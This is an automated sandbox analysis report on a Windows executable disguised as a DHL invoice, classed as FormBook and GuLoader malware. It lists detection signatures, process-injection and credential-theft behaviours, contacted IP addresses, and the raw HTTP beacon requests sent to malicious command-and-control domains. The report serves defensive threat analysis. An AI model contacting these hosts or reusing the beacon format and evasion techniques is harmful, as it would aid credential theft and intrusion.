Windows Analysis Report
DHLINV000156.exe

Overview

General Information

Sample Name:	DHLINV000156.exe
Analysis ID:	830443
MD5:	4cef4c9b4785b2bc5adcbf1c91185ab9
SHA1:	5e00a720edff53c27a6ee5fe4606a42cc2ab3a02
SHA256:	0a83a6c897b43357c341190cc93e0310cc8063f4e569853aba1c912ede95229f
Infos:

Detection

FormBook, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Yara detected GuLoader

Sample uses process hollowing technique

Tries to steal Mail credentials (via file / registry access)

Maps a DLL or memory area into another process

Writes to foreign memory regions

Tries to detect Any.run

Injects a PE file into a foreign processes

Yara detected Generic Downloader

Queues an APC in another process (thread injection)

Modifies the context of a thread in another process (thread injection)

Found potential ransomware demand text

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

PE file contains executable resources (Code or Archives)

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

PE file does not import any functions

Sample file is different than original file name gathered from version info

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Checks if the current process is being debugged

Binary contains a suspicious time stamp

PE / OLE file has an invalid certificate

PE file contains more sections than normal

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality for read data from the clipboard

Classification

Signatures

AV Detection

Multi AV Scanner detection for submitted file

Source: DHLINV000156.exe	Virustotal: Detection: 22%			Perma Link
Source: DHLINV000156.exe	ReversingLabs: Detection: 23%

Yara detected FormBook

Source: Yara match	File source: 0000000C.00000002.6881079830.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.6880751145.0000000004690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.6874962433.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3226190234.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3225862883.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Antivirus detection for URL or domain

Source: http://www.popcors.com/i9th/	Avira URL Cloud: Label: malware
Source: http://www.adasoft.info/i9th/www.adasoft.info	Avira URL Cloud: Label: malware
Source: http://www.hhkk143.cfd/i9th/?YM=a+ho0UoyjOnZk1lCGpcoaGjEnGbmKf9IFFNpvRdd6kC+DJQ8bYOFaRfvJPIieJPEPcY1cGGv0mjDAZsn1ciiV+plF0lWDSd4aQ==&F20=_ng1IJ	Avira URL Cloud: Label: malware
Source: http://www.popcors.com/i9th/?F20=_ng1IJ&YM=2Tzmt/R719tLBul7mSD638d/x74EcSC92+f/k2zWdQLWTlIxfL/M90/j5x2SA2nsSzi8rNl8g04ZV+bWcvwPkAs6VEt+1VDvVA==	Avira URL Cloud: Label: malware
Source: http://www.hayuterce.com	Avira URL Cloud: Label: malware
Source: http://www.popcors.com/i9th/www.popcors.com	Avira URL Cloud: Label: malware
Source: http://www.sandyhillsagritourism.com/i9th/?F20=_ng1IJ&YM=PDhFruS31XQUb4y36+furUas2tGpUbYkRl+Vt3Aa+IAT3kg40wU83JEX1Y8JNHLK9JPMefgRvvrtwUOOtwZiCVeSdeNGXRAYpw==	Avira URL Cloud: Label: malware
Source: http://www.dinggubd.net/i9th/	Avira URL Cloud: Label: malware
Source: http://www.spotcheck.site	Avira URL Cloud: Label: malware
Source: http://www.hayuterce.com/i9th/www.hayuterce.com	Avira URL Cloud: Label: malware
Source: http://www.37123.vip/i9th/www.37123.vip	Avira URL Cloud: Label: malware
Source: http://www.dinggubd.net/i9th/?F20=_ng1IJ&YM=skpIeuUmXVtlsTBo2HC5tT/aGHmA0xfCvZmPrRJBNh0Q4R2Cj+Wk81Dgip66N6Ewmv0qryLoIL5Vk4bBbPirrB4g3sIArb9fSw==	Avira URL Cloud: Label: malware
Source: http://www.casinoenligne-france.info/i9th/	Avira URL Cloud: Label: malware
Source: http://www.hot6s.com/i9th/www.hot6s.com	Avira URL Cloud: Label: malware
Source: http://www.hhkk143.cfd/i9th/	Avira URL Cloud: Label: malware
Source: http://www.hot6s.com	Avira URL Cloud: Label: malware
Source: http://www.casinoenligne-france.info/i9th/www.casinoenligne-france.info	Avira URL Cloud: Label: malware
Source: http://www.hot6s.com/i9th/	Avira URL Cloud: Label: malware
Source: http://www.cmproutdoors.com/i9th/www.cmproutdoors.com	Avira URL Cloud: Label: malware
Source: http://www.spotcheck.site/i9th/	Avira URL Cloud: Label: malware
Source: http://www.spotcheck.site/i9th/www.spotcheck.site	Avira URL Cloud: Label: malware
Source: http://www.adasoft.info/i9th/?F20=_ng1IJ&YM=7TOFWM92qV6pcrPqADbwGQbE1m3eI0WOEQ27vaT62sOH8JmND2m/uvMqxI1JrYebWMYnTtk64dqQKbYLv2YomR00aJ+FLC/PKQ==	Avira URL Cloud: Label: malware

Antivirus or Machine Learning detection for unpacked file

Source: 10.2.explorer.exe.14413814.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 12.2.colorcpl.exe.4bb3814.3.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 13.2.firefox.exe.b5d3814.0.unpack	Avira: Label: TR/Patched.Ren.Gen

Uses 32bit PE files

Source: DHLINV000156.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: DHLINV000156.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: /_/artifacts/obj/manual.System/net6.0-Release/System.pdbSHA256n source: DHLINV000156.exe, 00000002.00000003.1948493703.00000000028E4000.00000004.00000020.00020000.00000000.sdmp, System.dll.2.dr
Source:	Binary string: colorcpl.pdbGCTL source: DHLINV000156.exe, 00000008.00000003.3224594451.00000000031A4000.00000004.00000020.00020000.00000000.sdmp, DHLINV000156.exe, 00000008.00000002.3226706014.00000000000E0000.00000040.10000000.00040000.00000000.sdmp
Source:	Binary string: maintenanceservice.pdb@ 0%P% source: DHLINV000156.exe, 00000002.00000003.1951686037.00000000028ED000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.dr
Source:	Binary string: colorcpl.pdb source: DHLINV000156.exe, 00000008.00000003.3224594451.00000000031A4000.00000004.00000020.00020000.00000000.sdmp, DHLINV000156.exe, 00000008.00000002.3226706014.00000000000E0000.00000040.10000000.00040000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography.X509Certificates\net6.0-windows-Release\System.Security.Cryptography.X509Certificates.pdb source: DHLINV000156.exe, 00000002.00000003.1947032871.00000000028EA000.00000004.00000020.00020000.00000000.sdmp, System.Security.Cryptography.X509Certificates.dll.2.dr
Source:	Binary string: mshtml.pdb source: DHLINV000156.exe, 00000008.00000001.2368782551.0000000000649000.00000020.00000001.01000000.00000006.sdmp
Source:	Binary string: System.Security.Cryptography.X509Certificates.ni.pdb source: DHLINV000156.exe, 00000002.00000003.1947032871.00000000028EA000.00000004.00000020.00020000.00000000.sdmp, System.Security.Cryptography.X509Certificates.dll.2.dr
Source:	Binary string: /_/artifacts/obj/manual.System/net6.0-Release/System.pdb source: DHLINV000156.exe, 00000002.00000003.1948493703.00000000028E4000.00000004.00000020.00020000.00000000.sdmp, System.dll.2.dr
Source:	Binary string: wntdll.pdbUGP source: DHLINV000156.exe, 00000008.00000003.3129565235.000000003314E000.00000004.00000020.00020000.00000000.sdmp, DHLINV000156.exe, 00000008.00000002.3271993572.00000000334B0000.00000040.00001000.00020000.00000000.sdmp, DHLINV000156.exe, 00000008.00000002.3271993572.00000000335DD000.00000040.00001000.00020000.00000000.sdmp, DHLINV000156.exe, 00000008.00000003.3135331050.00000000332FE000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.6881661594.000000000494D000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000003.3231420300.000000000466F000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000003.3226013983.00000000044BB000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.6881661594.0000000004820000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\Builds\221\N2\HO_SE_g_2016_r_0\Sources\SolutionExplorer\target\nar\bin\x86-Windows-msvc\release\SolutionExplorerCLI.pdb source: DHLINV000156.exe, 00000002.00000003.1944530759.00000000028ED000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.2.dr
Source:	Binary string: wntdll.pdb source: DHLINV000156.exe, DHLINV000156.exe, 00000008.00000003.3129565235.000000003314E000.00000004.00000020.00020000.00000000.sdmp, DHLINV000156.exe, 00000008.00000002.3271993572.00000000334B0000.00000040.00001000.00020000.00000000.sdmp, DHLINV000156.exe, 00000008.00000002.3271993572.00000000335DD000.00000040.00001000.00020000.00000000.sdmp, DHLINV000156.exe, 00000008.00000003.3135331050.00000000332FE000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.6881661594.000000000494D000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000003.3231420300.000000000466F000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000003.3226013983.00000000044BB000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000002.6881661594.0000000004820000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdbUGP source: DHLINV000156.exe, 00000008.00000001.2368782551.0000000000649000.00000020.00000001.01000000.00000006.sdmp
Source:	Binary string: maintenanceservice.pdb source: DHLINV000156.exe, 00000002.00000003.1951686037.00000000028ED000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.dr
Source:	Binary string: firefox.pdb source: colorcpl.exe, 0000000C.00000003.3456433810.0000000007C80000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000C.00000003.3404469472.0000000007598000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 2_2_004062DD FindFirstFileA,FindClose,	2_2_004062DD
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 2_2_004057A2 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	2_2_004057A2
Source: C:\Users\user\Desktop\DHLINV000156.exe	Code function: 2_2_00402765 FindFirstFileA,	2_2_00402765

Source: C:\Users\user\Desktop\DHLINV000156.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\DHLINV000156.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows	Jump to behavior
Source: C:\Users\user\Desktop\DHLINV000156.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\DHLINV000156.exe	File opened: C:\Users\user\AppData\Local\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\DHLINV000156.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\DHLINV000156.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache	Jump to behavior

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 104.21.8.203 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 156.255.170.114 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 222.122.213.231 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.227.38.74 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.117.168.233 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 64.190.63.111 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 3.9.182.46 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 20.239.65.138 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 199.192.30.193 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 38.163.2.19 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.53.177.54 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 188.114.96.3 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 154.210.212.94 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 85.13.156.177 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 164.88.122.250 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 81.88.48.71 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 173.230.227.171 80	Jump to behavior

Yara detected Generic Downloader

Source: Yara match

File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\internuptial\Smertelig\Registrer\System.dll, type: DROPPED

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /i9th/?F20=_ng1IJ&YM=PDhFruS31XQUb4y36+furUas2tGpUbYkRl+Vt3Aa+IAT3kg40wU83JEX1Y8JNHLK9JPMefgRvvrtwUOOtwZiCVeSdeNGXRAYpw== HTTP/1.1Host: www.sandyhillsagritourism.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i9th/?YM=z7FIOMl2i6pYQmyH2ErzvRvTq7+wkT+xjTHk/876j4Q/5vAls38NbxDvDu1KKOzJ/k110/24aT2WAbPRlApsmRrAhaQg7G9jLg==&F20=_ng1IJ HTTP/1.1Host: www.sem-jobs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i9th/?F20=_ng1IJ&YM=k6CZcF1ZzBrKa1yLo5gUvle0ANnyvLBM7QyaLf2rdBQJTudoAeDS0wYpaDY8EKJddZnFAls+GzNjbQwIPoLL7cj/l4B8r0J0qw== HTTP/1.1Host: www.casinoenligne-france.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i9th/?YM=QFexSP2v0Nfahq1S1liqATm5JxjoDmOPLniWa5ukQb1HIcv0ZKrmbVZaJMRsWG1ma9D40wKdkkU/v7zCXk+Vmaqrz8TPF5AIjg==&F20=_ng1IJ HTTP/1.1Host: www.37123.vipConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i9th/?F20=_ng1IJ&YM=7TOFWM92qV6pcrPqADbwGQbE1m3eI0WOEQ27vaT62sOH8JmND2m/uvMqxI1JrYebWMYnTtk64dqQKbYLv2YomR00aJ+FLC/PKQ== HTTP/1.1Host: www.adasoft.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i9th/?YM=a+ho0UoyjOnZk1lCGpcoaGjEnGbmKf9IFFNpvRdd6kC+DJQ8bYOFaRfvJPIieJPEPcY1cGGv0mjDAZsn1ciiV+plF0lWDSd4aQ==&F20=_ng1IJ HTTP/1.1Host: www.hhkk143.cfdConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i9th/?F20=_ng1IJ&YM=2Tzmt/R719tLBul7mSD638d/x74EcSC92+f/k2zWdQLWTlIxfL/M90/j5x2SA2nsSzi8rNl8g04ZV+bWcvwPkAs6VEt+1VDvVA== HTTP/1.1Host: www.popcors.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i9th/?YM=zQVcsXcgs6FIBsavZKdNfD9L9IyDn+uX2155hsx4ti6GChTIuvpprxYWozt816wf2SlZqQ0WfllzqwVqRSAw6movAhpuxOp8gg==&F20=_ng1IJ HTTP/1.1Host: www.spotcheck.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i9th/?F20=_ng1IJ&YM=skpIeuUmXVtlsTBo2HC5tT/aGHmA0xfCvZmPrRJBNh0Q4R2Cj+Wk81Dgip66N6Ewmv0qryLoIL5Vk4bBbPirrB4g3sIArb9fSw== HTTP/1.1Host: www.dinggubd.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i9th/?YM=e0G7KvvSnXpGXx+R6TzWFmwlzMjwM1CfwQYDrhzCOtfsddq8ukik0UKA2v6ej/ZrW3TOdSCJ2lVMgjL9UMLlhRMn0e8ae0vL4Q==&F20=_ng1IJ HTTP/1.1Host: www.hot6s.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i9th/?F20=_ng1IJ&YM=uGolGY6UqX3sY/9PLVWwN9J/BTzz+6hffrhecVGN5FjI635Z0j5At+r+BPTklOB2HfIE21jETmQJryl68L/U0+pl2AIDG80kBg== HTTP/1.1Host: www.0w3jy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i9th/?YM=lqJURYfuPjuznURrThj0aNiAAsaH1/tf+kf9L6kKBxqjEkH5T6yZpcUSZY6yP89JvXg35e6PTbHFvlwlO73OfbEtyEO8MEspLQ==&F20=_ng1IJ HTTP/1.1Host: www.cmproutdoors.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i9th/?F20=_ng1IJ&YM=f7i/reR9z/XYtiufs4T2oCglTJHppPIhAuHFUSLntHIlLxYI6+YKRHThES4heztnev1TOQxmA1eDErfm329tx1/Ku+4bHpf60w== HTTP/1.1Host: www.daon3999.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i9th/?YM=oRug1p2N3M7f21OO0lOBGqE4PfaV2grEv9VY5puRv4+mIhzAnHI5ZAphwtkKSkIVc0m4kQAL+gvPk8R76uitxElzOZBQuGepJQ==&F20=_ng1IJ HTTP/1.1Host: www.5319ss.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i9th/?F20=_ng1IJ&YM=djsn1an+GmzwXFTB/MFsKGQXJOZQhusBpj6p6RqECbOdtpCOv2Kvcnth4kqs1edHWjVNJqZCDFfEwc47KO0/1j4B7gbgnVo+SQ== HTTP/1.1Host: www.riverflow.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i9th/?YM=k3d2rpkNYMKNWaTFA3t0FG4YoWbTiA9z8X9PQFaufAL9B597B9+6rAPLCs31mdZA/v+HUWU5or1J0geLcv9LMooOfPEJdI/q3g==&F20=_ng1IJ HTTP/1.1Host: www.verde-amar.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i9th/?F20=_ng1IJ&YM=PDhFruS31XQUb4y36+furUas2tGpUbYkRl+Vt3Aa+IAT3kg40wU83JEX1Y8JNHLK9JPMefgRvvrtwUOOtwZiCVeSdeNGXRAYpw== HTTP/1.1Host: www.sandyhillsagritourism.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i9th/?YM=z7FIOMl2i6pYQmyH2ErzvRvTq7+wkT+xjTHk/876j4Q/5vAls38NbxDvDu1KKOzJ/k110/24aT2WAbPRlApsmRrAhaQg7G9jLg==&F20=_ng1IJ HTTP/1.1Host: www.sem-jobs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i9th/?F20=_ng1IJ&YM=k6CZcF1ZzBrKa1yLo5gUvle0ANnyvLBM7QyaLf2rdBQJTudoAeDS0wYpaDY8EKJddZnFAls+GzNjbQwIPoLL7cj/l4B8r0J0qw== HTTP/1.1Host: www.casinoenligne-france.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i9th/?YM=QFexSP2v0Nfahq1S1liqATm5JxjoDmOPLniWa5ukQb1HIcv0ZKrmbVZaJMRsWG1ma9D40wKdkkU/v7zCXk+Vmaqrz8TPF5AIjg==&F20=_ng1IJ HTTP/1.1Host: www.37123.vipConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i9th/?F20=_ng1IJ&YM=7TOFWM92qV6pcrPqADbwGQbE1m3eI0WOEQ27vaT62sOH8JmND2m/uvMqxI1JrYebWMYnTtk64dqQKbYLv2YomR00aJ+FLC/PKQ== HTTP/1.1Host: www.adasoft.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i9th/?YM=a+ho0UoyjOnZk1lCGpcoaGjEnGbmKf9IFFNpvRdd6kC+DJQ8bYOFaRfvJPIieJPEPcY1cGGv0mjDAZsn1ciiV+plF0lWDSd4aQ==&F20=_ng1IJ HTTP/1.1Host: www.hhkk143.cfdConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i9th/?F20=_ng1IJ&YM=2Tzmt/R719tLBul7mSD638d/x74EcSC92+f/k2zWdQLWTlIxfL/M90/j5x2SA2nsSzi8rNl8g04ZV+bWcvwPkAs6VEt+1VDvVA== HTTP/1.1Host: www.popcors.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i9th/?YM=zQVcsXcgs6FIBsavZKdNfD9L9IyDn+uX2155hsx4ti6GChTIuvpprxYWozt816wf2SlZqQ0WfllzqwVqRSAw6movAhpuxOp8gg==&F20=_ng1IJ HTTP/1.1Host: www.spotcheck.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i9th/?F20=_ng1IJ&YM=skpIeuUmXVtlsTBo2HC5tT/aGHmA0xfCvZmPrRJBNh0Q4R2Cj+Wk81Dgip66N6Ewmv0qryLoIL5Vk4bBbPirrB4g3sIArb9fSw== HTTP/1.1Host: www.dinggubd.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /i9th/?YM=e0G7KvvSnXpGXx+R6TzWFmwlzMjwM1CfwQYDrhzCOtfsddq8ukik0UKA2v6ej/ZrW3TOdSCJ2lVMgjL9UMLlhRMn0e8ae0vL4Q==&F20=_ng1IJ HTTP/1.1Host: www.hot6s.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 156.255.170.114 156.255.170.114

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 10:56:33 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 10:56:36 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 10:56:38 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 10:56:41 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
